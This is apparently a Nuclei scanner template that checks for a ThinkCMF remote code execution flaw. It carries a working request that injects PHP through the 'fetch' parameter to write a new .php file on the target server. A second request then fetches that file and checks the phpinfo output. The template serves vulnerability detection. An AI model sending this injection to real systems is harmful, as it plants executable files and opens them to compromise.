id: thinkcmf-rce

info:
  name: ThinkCMF - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: ThinkCMF  is susceptible to a remote code execution vulnerability.
  reference:
    - https://www.freebuf.com/vuls/217586.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
  tags: thinkcmf,rce

requests:
  - raw:
      - |
        GET /index.php?a=fetch&content={{url_encode('<?php file_put_contents(\"{{randstr}}.php\",\"<?php echo phpinfo();\");')}} HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "PHP Extension")'
          - 'contains(body_2, "PHP Version")'
          - 'status_code_2 == 200'
        condition: and

# Enhanced by mp on 2022/05/31
